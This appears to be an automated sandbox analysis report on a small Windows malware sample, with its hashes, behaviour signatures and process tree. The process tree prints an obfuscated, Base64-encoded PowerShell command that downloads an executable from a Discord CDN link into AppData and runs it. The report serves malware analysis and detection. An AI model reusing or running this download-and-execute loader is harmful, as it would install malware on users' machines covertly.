Analysis
-
max time kernel
135s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
01/02/2023, 16:00
Static task
static1
Behavioral task
behavioral1
Sample
d7f8019fa6a535bc1b0b7f9fc1f751ae.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
d7f8019fa6a535bc1b0b7f9fc1f751ae.exe
Resource
win10v2004-20220812-en
General
-
Target
d7f8019fa6a535bc1b0b7f9fc1f751ae.exe
-
Size
5KB
-
MD5
d7f8019fa6a535bc1b0b7f9fc1f751ae
-
SHA1
f496986f7a40c0a9ef35c950f48522faf7d403d9
-
SHA256
46c6ffe88a3541f179da56eac0d6649fe5b20b561a43793bb7b5c1b8282ad4df
-
SHA512
aa76eb6b09fe7fa2b1a2008ca2d1bebb76cb628b786635b21fad0f44a5c895f6089a790e11dd620bb741c6cca223511cd18e971a68a3e3b223b5cfabbd9fea65
-
SSDEEP
96:cHkI5797fCFVwiTVtowwvk+dw78bC/+PGc7Y3d3ojVrl:WJ976FPVnwvka+8bC/+Pg3ds
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 1620 powershell.exe 8 1620 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1620 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1772 wrote to memory of 1620 1772 d7f8019fa6a535bc1b0b7f9fc1f751ae.exe 28 PID 1772 wrote to memory of 1620 1772 d7f8019fa6a535bc1b0b7f9fc1f751ae.exe 28 PID 1772 wrote to memory of 1620 1772 d7f8019fa6a535bc1b0b7f9fc1f751ae.exe 28
Processes
-
C:\Users\Admin\AppData\Local\Temp\d7f8019fa6a535bc1b0b7f9fc1f751ae.exe"C:\Users\Admin\AppData\Local\Temp\d7f8019fa6a535bc1b0b7f9fc1f751ae.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAaABsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQA0ADEAMwA5ADQANQA1ADMAMgA1ADAANgAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAHIAdwB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZABmAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBuAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAwAC4AZQB4AGUAJwApACkAPAAjAHQAZgBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHUAaQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGwAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADAALgBlAHgAZQAnACkAPAAjAHAAawBqACMAPgA="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-